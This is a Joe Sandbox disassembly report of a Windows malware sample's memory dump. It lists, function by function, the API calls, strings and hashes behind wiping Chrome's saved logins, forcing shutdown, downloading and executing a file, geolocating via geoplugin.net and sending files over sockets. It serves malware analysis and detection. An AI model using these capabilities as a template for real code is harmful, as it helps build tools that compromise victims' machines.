Function 00413FCA Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 382registrylibraryloaderCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0041409D
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140A9

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 0041426A
GetProcAddress.KERNEL32(00000000), ref: 00414271

Strings

SHDeleteKeyW, xrefs: 00414260
Shlwapi.dll, xrefs: 00414265

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: AddressCloseCreateLibraryLoadProcsend
String ID: SHDeleteKeyW$Shlwapi.dll
API String ID: 2127411465-314212984
Opcode ID: 503daa7f3cf37e559493f2b38fbdbd662be014167a3854e37f89a3b2555f4814
Instruction ID: ad322413622673165c78a8c4b5f48079e939d646f467ca97d3bec1feacf55119
Opcode Fuzzy Hash: 503daa7f3cf37e559493f2b38fbdbd662be014167a3854e37f89a3b2555f4814
Instruction Fuzzy Hash: F9B1F971A0430066CA14FB76DC5B9AF36A86FD1748F40053FF942771E2EE7C9A4886DA

Uniqueness

Uniqueness Score: -1.00%

Function 00449190 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00449212
_free.LIBCMT ref: 00449236
_free.LIBCMT ref: 004493BD
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
_free.LIBCMT ref: 00449589

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: e51e2b160430e069a94018d2a40d83d225257a5f61c10d126208887eb2308fed
Instruction ID: 779aab753f07af14b01adf3fce5c8211df4e7f9331a35af1166ddbde82723190
Opcode Fuzzy Hash: e51e2b160430e069a94018d2a40d83d225257a5f61c10d126208887eb2308fed
Instruction Fuzzy Hash: CAC15771900205ABFB24DF69CC41AAFBBA8EF46314F1405AFE89497381E7788E42D758

Uniqueness

Uniqueness Score: -1.00%

Function 004167B4 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 97libraryloadershutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00417952: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
Part of subcall function 00417952: OpenProcessToken.ADVAPI32(00000000), ref: 00417966
Part of subcall function 00417952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
Part of subcall function 00417952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
Part of subcall function 00417952: GetLastError.KERNEL32 ref: 0041799D

ExitWindowsEx.USER32(00000000,00000001), ref: 00416856
LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 0041686B
GetProcAddress.KERNEL32(00000000), ref: 00416872

Strings

SetSuspendState, xrefs: 00416861
PowrProf.dll, xrefs: 00416866
!D@, xrefs: 00417089

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
String ID: !D@$PowrProf.dll$SetSuspendState
API String ID: 1589313981-2876530381
Opcode ID: 518a98aa8e33dee1c4de961979bab0d7f2b6bdf321556802f5344010ded5f568
Instruction ID: 15d3ae9bc4d358b9de40311b9e813ebd0b85961e95f80c383f5c7d57e5fc9640
Opcode Fuzzy Hash: 518a98aa8e33dee1c4de961979bab0d7f2b6bdf321556802f5344010ded5f568
Instruction Fuzzy Hash: 6E21617060430256CB14FBB68856AAE63599F41788F41487FB442A72D3EF3CD845CBAE

Uniqueness

Uniqueness Score: -1.00%

Function 0045243C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,2000000B,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524D5
GetLocaleInfoW.KERNEL32(00000000,20001004,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524FE
GetACP.KERNEL32(?,?,0045275B,?,00000000), ref: 00452513

Strings

ACP, xrefs: 0045245A
OCP, xrefs: 00452490
['E, xrefs: 004524F3, 004524CA

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP$['E
API String ID: 2299586839-2532616801
Opcode ID: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
Instruction ID: 65f7b5195a5790e2d5819d7d4b0c6b76a8aa59636dcad79128a037cfc813d78c
Opcode Fuzzy Hash: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
Instruction Fuzzy Hash: FD21F432600104A7DB348F54CF00AA773A6EB47B1AB168567EC09D7302F7BADD48C398

Uniqueness

Uniqueness Score: -1.00%

Function 0041B380 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B3A7
InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B3BD
InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B3D6
InternetCloseHandle.WININET(00000000), ref: 0041B41C
InternetCloseHandle.WININET(00000000), ref: 0041B41F

Strings

http://geoplugin.net/json.gp, xrefs: 0041B3B7

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleOpen$FileRead
String ID: http://geoplugin.net/json.gp
API String ID: 3121278467-91888290
Opcode ID: 93fb62275c9c30ece467367bc9d260af9d028c0859994e7c2f4e10a89ee4ed45
Instruction ID: bc766ab0241d3587a1949f89688fbc1c60562a782fd7f61c1deed4db1e92f461
Opcode Fuzzy Hash: 93fb62275c9c30ece467367bc9d260af9d028c0859994e7c2f4e10a89ee4ed45
Instruction Fuzzy Hash: E711EB311053126BD224AB269C49EBF7F9CEF86755F00043EF905A2292DB68DC45C6FA

Uniqueness

Uniqueness Score: -1.00%

Function 0040BA12 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA4E
GetLastError.KERNEL32 ref: 0040BA58

Strings

\AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA19
[Chrome StoredLogins not found], xrefs: 0040BA72
[Chrome StoredLogins found, cleared!], xrefs: 0040BA7E
UserProfile, xrefs: 0040BA1E

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: DeleteErrorFileLast
String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
API String ID: 2018770650-1062637481
Opcode ID: 0e718a6ebf02f44b4289ad564225df6632aa7359f7d3b59aeb067c3ad082f2b5
Instruction ID: af402a2c9819bc64f7c9913ab42ffc044d60d1b3c88a69bbc3d4df1d4d30a246
Opcode Fuzzy Hash: 0e718a6ebf02f44b4289ad564225df6632aa7359f7d3b59aeb067c3ad082f2b5
Instruction Fuzzy Hash: 2D01A7B17801056AC70477B6CD5B9BE77249911704F50057FF802725E2FE7D59098ADE

Uniqueness

Uniqueness Score: -1.00%

Function 00417952 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
OpenProcessToken.ADVAPI32(00000000), ref: 00417966
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
GetLastError.KERNEL32 ref: 0041799D

Strings

SeShutdownPrivilege, xrefs: 00417972

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
String ID: SeShutdownPrivilege
API String ID: 3534403312-3733053543
Opcode ID: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
Instruction ID: b599e5caaba2c857c5a7044ea86e3d1b9a306509f9612008a7a3a71442eb1233
Opcode Fuzzy Hash: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
Instruction Fuzzy Hash: 1EF03AB1801229FBDB109BA0EC4DEEF7FBCEF05612F100461B809A1092D7388E04CAB5

Uniqueness

Uniqueness Score: -1.00%

Function 00409253 Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00409258

Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

__CxxThrowException@8.LIBVCRUNTIME ref: 004092F4
FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00409352
FindNextFileW.KERNEL32(00000000,?), ref: 004093AA
FindClose.KERNEL32(00000000), ref: 004093C1

Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,?,?,?,00474EF8,?), ref: 00404E38
Part of subcall function 00404E26: SetEvent.KERNEL32(?), ref: 00404E43
Part of subcall function 00404E26: FindCloseChangeNotification.KERNELBASE(?), ref: 00404E4C

FindClose.KERNEL32(00000000), ref: 004095B9

Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: Find$Close$EventFileObjectSingleWait$ChangeException@8FirstH_prologNextNotificationThrowconnectsend
String ID:
API String ID: 2435342581-0
Opcode ID: 27b22fca0a27779137ade02a72c9abe49e1240f26c7200fc68e50cf31d4d9716
Instruction ID: 125c9cc0036adb3739497efb01147483584b5989e706bb19fe9a4109aadf0594
Opcode Fuzzy Hash: 27b22fca0a27779137ade02a72c9abe49e1240f26c7200fc68e50cf31d4d9716
Instruction Fuzzy Hash: DCB18D32900109AACB14EBA1DD96AED7779AF04318F10417FF506B60E2EF785E49CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0041AA4A Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A6A0,00000000), ref: 0041AA53
OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A6A0,00000000), ref: 0041AA68
CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA75
StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A6A0,00000000), ref: 0041AA80
CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA92
CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA95

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ManagerStart
String ID:
API String ID: 276877138-0
Opcode ID: 9428b136f56b7ac5d2013585799c428180de648bb4d6702bc273cde58ba3a705
Instruction ID: 9fefcdd13c5f6832e1e8d6374d810b05479d45f16fba084c356bea358aebaaee
Opcode Fuzzy Hash: 9428b136f56b7ac5d2013585799c428180de648bb4d6702bc273cde58ba3a705
Instruction Fuzzy Hash: FCF08971101325AFD2119B619C88DFF2B6CDF85BA6B00082AF945921919B68CD49E9B9

Uniqueness

Uniqueness Score: -1.00%

Function 00451CD8 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 236COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
Part of subcall function 00448215: _abort.LIBCMT ref: 00448293

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444A73,?,?,?,?,004444CA,?,00000004), ref: 00451DBA
_wcschr.LIBVCRUNTIME ref: 00451E4A
_wcschr.LIBVCRUNTIME ref: 00451E58
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,sJD,00000000,?), ref: 00451EFB

Strings

sJD, xrefs: 00451DD1, 00451E19, 00451EC1

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
String ID: sJD
API String ID: 4212172061-3536923933
Opcode ID: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
Instruction ID: 601d6103ecad0283333aca7e4f79148897faf6e4cefa34abd84194fcdbd45a0d
Opcode Fuzzy Hash: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
Instruction Fuzzy Hash: ED61FA35500606AAE724AB75CC86BBB73A8EF04316F14046FFD05D7292EB78ED48C769

Uniqueness

Uniqueness Score: -1.00%

Function 0040F7A7 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00413549: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,00000000), ref: 00413569
Part of subcall function 00413549: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 00413587
Part of subcall function 00413549: RegCloseKey.ADVAPI32(00000000), ref: 00413592

Sleep.KERNEL32(00000BB8), ref: 0040F85B
ExitProcess.KERNEL32 ref: 0040F8CA

Strings

override, xrefs: 0040F7CC
pth_unenc, xrefs: 0040F7BD, 0040F804, 0040F871
4.9.4 Pro, xrefs: 0040F836, 0040F8A3

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: CloseExitOpenProcessQuerySleepValue
String ID: 4.9.4 Pro$override$pth_unenc
API String ID: 2281282204-930821335
Opcode ID: 239e53c764d611775cc28217bb96d4133c4679258c828bc8db514802d76be294
Instruction ID: 07d0e0dc4205ecb16ec703249a4fc897915f305b32a2beb09604d1d6565ffe0f
Opcode Fuzzy Hash: 239e53c764d611775cc28217bb96d4133c4679258c828bc8db514802d76be294
Instruction Fuzzy Hash: F821F371B0420167C604767A485B6AE35A95B80718F90403FF505676D7FF7C8E0583EF

Uniqueness

Uniqueness Score: -1.00%

Function 0041B4A8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B4B9
LoadResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4CD
LockResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4D4
SizeofResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4E3

Strings

SETTINGS, xrefs: 0041B4AC

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: Resource$FindLoadLockSizeof
String ID: SETTINGS
API String ID: 3473537107-594951305
Opcode ID: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
Instruction ID: 65170a014006dd87783428e4339c5f85687a52ee3761dac8d56b05c0676c202a
Opcode Fuzzy Hash: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
Instruction Fuzzy Hash: 8AE01A36200B22EBEB311BA5AC4CD473E29F7C97637100075F90596232CB798840DAA8

Uniqueness

Uniqueness Score: -1.00%

Function 00409665 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040966A
FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004096E2
FindNextFileW.KERNEL32(00000000,?), ref: 0040970B
FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00409722

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstH_prologNext
String ID:
API String ID: 1157919129-0
Opcode ID: f1abb1e18261a1922addd69d7cffa3ae5e96847022b02d1b31507e848c25f0fe
Instruction ID: bc6583c976318a9931a9d4e75bf6093b5b8d8c817350453c5398c0af4fd679c1
Opcode Fuzzy Hash: f1abb1e18261a1922addd69d7cffa3ae5e96847022b02d1b31507e848c25f0fe
Instruction Fuzzy Hash: 59812B329001199BCB15EBA1DC969EDB378AF14318F10417FE506B71E2EF78AE49CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040880C Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00408811
FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
__CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A15

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: Find$File$CloseException@8FirstH_prologNextThrow
String ID:
API String ID: 1771804793-0
Opcode ID: 343675e76b0a0f9536e7689d5bfc322d86527155193a82fc771824cafc66db2c
Instruction ID: 1e810be39857a3d86828f92fa26e793a4655b35e172fafea17edde612d57cc14
Opcode Fuzzy Hash: 343675e76b0a0f9536e7689d5bfc322d86527155193a82fc771824cafc66db2c
Instruction Fuzzy Hash: 16515F72900209AACF04FB61DD569ED7778AF11308F50417FB946B61E2EF389B48CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00406EB0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FBC
URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070A0

Strings

open, xrefs: 00406FB6
C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe, xrefs: 00407007, 0040712F

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: DownloadExecuteFileShell
String ID: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe$open
API String ID: 2825088817-225355153
Opcode ID: 8341db3bc302fba65028eb5830d70bd40add62ae0f2dccab7f4c30313c030271
Instruction ID: 27a8b34c094a82f854f2ee3e6b31e6014a71d41456184bc7540e3ceb6c1d0c01
Opcode Fuzzy Hash: 8341db3bc302fba65028eb5830d70bd40add62ae0f2dccab7f4c30313c030271
Instruction Fuzzy Hash: 6561A171B0830166CA24FB76C8569BE37A59F81748F50093FB942772D2EE3C9905C69B

Uniqueness

Uniqueness Score: -1.00%

Function 0040783C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407857
FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040791F

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Strings

XPG, xrefs: 00407877
XPG, xrefs: 0040793A

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: FileFind$FirstNextsend
String ID: XPG$XPG
API String ID: 4113138495-1962359302
Opcode ID: da2a088c2c47bfc86c5ef0d10107ac4426fe09f0bf14043eaa07d8cc52736815
Instruction ID: 6b6d716c6ecdfe6ec78918620e47e684a121d368db73a1555a51ac38f2ecb6eb
Opcode Fuzzy Hash: da2a088c2c47bfc86c5ef0d10107ac4426fe09f0bf14043eaa07d8cc52736815
Instruction Fuzzy Hash: 212195325083419BC314FB61D855DEFB3ACAF90358F40493EF696621E1EF78AA09C65B

Uniqueness

Uniqueness Score: -1.00%

Function 0041C9E2 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7

Part of subcall function 0041376F: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046611C), ref: 0041377E
Part of subcall function 0041376F: RegSetValueExA.ADVAPI32(0046611C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000), ref: 004137A6
Part of subcall function 0041376F: RegCloseKey.ADVAPI32(0046611C,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000,?,0040875D,00000001), ref: 004137B1

Strings

Control Panel\Desktop, xrefs: 0041CA1D, 0041CA50, 0041CAA0
WallpaperStyle, xrefs: 0041CA22, 0041CA55, 0041CAA5
TileWallpaper, xrefs: 0041CAC1

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: CloseCreateInfoParametersSystemValue
String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
API String ID: 4127273184-3576401099
Opcode ID: 3c2d205688c6346916b5703b91afcadbe5e4724bf31c27c5056ca6af97e88c58
Instruction ID: 1197cbbb31bb874c57b9e92d70abebba424d259215afdbf251ae70ffa4d9d73d
Opcode Fuzzy Hash: 3c2d205688c6346916b5703b91afcadbe5e4724bf31c27c5056ca6af97e88c58
Instruction Fuzzy Hash: 7B1184B2BC021473D419313E5DABBBE28029743B51F94416BF6123A6C6E8DF0A8102CF

Uniqueness

Uniqueness Score: -1.00%

Function 004461F0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 464COMMONLIBRARYCODE

Download Yara Rule

Strings

PkGNG, xrefs: 004461F2

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID:
String ID: PkGNG
API String ID: 0-263838557
Opcode ID: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
Instruction ID: a89a86a7c059f2ce1b75669fee0c4fca3fa64158462c9470c468cddaecc71d09
Opcode Fuzzy Hash: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
Instruction Fuzzy Hash: FB025D71E002199BEF14CFA9D8806AEBBF1FF49324F26416AD819E7344D734AE41CB85

Uniqueness

Uniqueness Score: -1.00%

Function 004520C3 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
Part of subcall function 00448215: _abort.LIBCMT ref: 00448293

Part of subcall function 00448215: _free.LIBCMT ref: 00448274
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452117
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452168
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452228

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: ErrorInfoLastLocale$_free$_abort
String ID:
API String ID: 2829624132-0
Opcode ID: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
Instruction ID: 4b80d7ab7a7ff47978e382ad652e238d088576b56b9f239e8998609391b98480
Opcode Fuzzy Hash: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
Instruction Fuzzy Hash: B961C1315006079BDB289F25CE82BBB77A8FF05306F1041ABED15C6642F7B89D89DB58

Uniqueness

Uniqueness Score: -1.00%

Function 00433837 Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,?,004334BF,00000034,?,?,00000000), ref: 00433849
CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,PkGNG,00433552,?,?,?), ref: 0043385F
CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,PkGNG,00433552,?,?,?,0041E251), ref: 00433871

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: Crypt$Context$AcquireRandomRelease
String ID:
API String ID: 1815803762-0
Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
Instruction ID: 864202151b2ab8ebdb17250bb7e2999cce5b6c404a207f59f2405eb254ca80c1
Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
